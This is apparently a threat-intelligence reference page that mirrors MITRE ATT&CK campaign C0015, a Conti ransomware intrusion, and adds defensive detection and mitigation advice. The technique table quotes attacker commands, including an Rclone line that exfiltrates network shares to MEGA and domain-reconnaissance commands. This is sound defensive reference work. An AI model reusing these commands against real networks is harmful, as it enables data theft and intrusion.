C0015: C0015
C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]
Analyst context for executives and security teams
C0015 matters because it represents a fast ransomware intrusion pattern: unidentified attackers used Bazar, Cobalt Strike, Conti, and other tools over a five-day period, with activity assessed by researchers as consistent with the widely circulated Conti ransomware playbook. For leaders, the decision value is not the campaign name; it is whether the organization can detect and contain downloader/backdoor activity, post-exploitation tooling, Active Directory discovery, lateral movement, data staging/exfiltration preparation, and ransomware deployment before business operations are disrupted.
Executive priority
Treat this as a resilience and incident-readiness benchmark for ransomware defense. Executives should ask whether SOC, identity, endpoint, network, and backup teams can work from a shared ransomware playbook during a compressed multi-day intrusion. Priority should go to validating visibility across Windows administration activity, Active Directory enumeration, RDP/WMI use, tool transfer, data collection from local systems and shares, staging, and possible cloud-storage sync tooling such as Rclone. Because ATT&CK provides no official detection text for this campaign, local evidence and tested response procedures are essential for audit confidence and operational readiness.
Technical view
For SOC and IR teams, C0015 should be mapped as a campaign-level scenario involving Bazar, Cobalt Strike, Conti, AdFind, and Rclone, plus techniques including command shell, Visual Basic, JavaScript, WMI, RDP, process/file/network discovery, local and domain group discovery, local and network-share data collection, local staging, ingress tool transfer, obfuscation, masquerading, DLL injection, and data transfer size limits. Validate whether detections correlate early-stage downloader/backdoor behavior with follow-on discovery, credentialed remote access, administrative execution, file staging, and exfiltration-preparation signals rather than treating each alert in isolation.
Likely telemetry
- Endpoint process creation and command-line logging for cmd, scripting, discovery commands, AdFind-like LDAP queries, and renamed or suspicious utilities
- Windows event telemetry for RDP logons, WMI activity, remote execution, local and domain group enumeration, and administrative access patterns
- EDR telemetry for DLL injection, process relationships, suspicious child processes, obfuscated files, masquerading, and tool transfer
- Network telemetry for Cobalt Strike-like command-and-control patterns, unusual outbound connections, ingress tool downloads, and constrained or chunked data transfers
- File system telemetry for sensitive-file discovery, access to local data sources, network share access, bulk copy activity, and local staging directories
Detection direction
- Build correlation around the intrusion sequence: downloader/backdoor presence, tool transfer, discovery, privilege or identity-focused enumeration, lateral movement via RDP/WMI, collection/staging, and ransomware tooling.
- Tune for legitimate administration overlap. RDP, WMI, command shell, group enumeration, and file copy activity are common in enterprise operations, so detections should account for user role, host criticality, time of day, source/destination pairings, and change windows.
- Validate visibility for Active Directory discovery, especially AdFind-like behavior and domain/local group enumeration, because these signals often decide whether defenders can see ransomware operators preparing lateral movement.
- Look for gaps around network shares and data staging. Many environments monitor malware execution better than bulk file access, staging directories, archive preparation, or sync-tool usage.
- Because official ATT&CK detection guidance is not provided for C0015, use the related software and techniques as coverage requirements and test them with internal purple-team or detection validation exercises.
Mitigation priorities
- Prioritize identity and administrative access controls: restrict and monitor RDP/WMI, enforce least privilege, and review local/domain admin exposure.
- Harden endpoint execution paths by controlling script execution, suspicious command-line use, unauthorized remote access tools, and unapproved file-transfer or cloud-sync utilities.
- Improve segmentation and lateral movement resistance around critical servers, file shares, backup infrastructure, and administrative workstations.
- Prepare ransomware-specific response actions: rapid endpoint isolation, account disablement, evidence preservation, backup validation, and executive decision triggers.
- Use this campaign as a tabletop and detection-engineering scenario to prove that SOC, IR, identity, infrastructure, and business-continuity teams can respond within a compressed multi-day intrusion window.
Analyst notes and limits
The strongest defensive lesson from C0015 is sequence awareness. The campaign description and relationships point to a ransomware intrusion involving Bazar, Cobalt Strike, Conti, AdFind, Rclone, discovery, remote execution, lateral movement, collection, staging, and exfiltration-related behavior. The campaign’s actors are unidentified in the supplied ATT&CK fields, so attribution should not drive prioritization; readiness against the behavior should.
ATT&CK does not provide official detection text, campaign-level platforms, or tactics for C0015 in the supplied object. Platform references come only from related software and technique objects. This summary does not assert current activity, customer exposure, or guaranteed detection coverage; organizations must validate against their own telemetry, controls, and incident history.
C0015
C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1135 | Network Share Discovery | During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1047 | Windows Management Instrumentation | During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1083 | File and Directory Discovery | During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1553.002 | Code Signing Sub-technique | For C0015, the threat actors used DLL files that had invalid certificates.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage Sub-technique | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1204.002 | Malicious File Sub-technique | During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1005 | Data from Local System | During C0015, the threat actors obtained files and data from the compromised network.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1069.001 | Local Groups Sub-technique | During C0015, the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1057 | Process Discovery | During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1069.002 | Domain Groups Sub-technique | During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1105 | Ingress Tool Transfer | During C0015, the threat actors downloaded additional tools and files onto a compromised network.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1055.001 | Dynamic-link Library Injection Sub-technique | During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1486 | Data Encrypted for Impact | |
| Enterprise | T1027 | Obfuscated Files or Information | During C0015, the threat actors used Base64-encoded strings.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | During C0015, the threat actors employed code that used `regsvr32` for execution.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1588.001 | Malware Sub-technique | For C0015, the threat actors used Cobalt Strike and Conti ransomware.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | During C0015, the threat actors used RDP to access specific network hosts of interest.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1124 | System Time Discovery | During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1030 | Data Transfer Size Limits | |
| Enterprise | T1219.002 | Remote Desktop Software Sub-technique | During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1039 | Data from Network Shared Drive | During C0015, the threat actors collected files from network shared drives prior to network encryption.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1570 | Lateral Tool Transfer | During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1018 | Remote System Discovery | During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1016 | System Network Configuration Discovery | During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1059.007 | JavaScript Sub-technique | During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1036 | Masquerading | During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1482 | Domain Trust Discovery | During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.CitationDFIR Conti Bazar Nov 2021 |
| Enterprise | T1218.005 | Mshta Sub-technique | During C0015, the threat actors used `mshta` to execute DLLs.CitationDFIR Conti Bazar Nov 2021 |
Groups, software, and campaigns
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0552: AdFind
S0575: Conti
Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[1][2][3]
S1040: Rclone
S0534: Bazar
Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 39d32cb0180d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
DFIR Conti Bazar Nov 2021
DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
Open source URL -
[2]
mitre-attack C0015Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.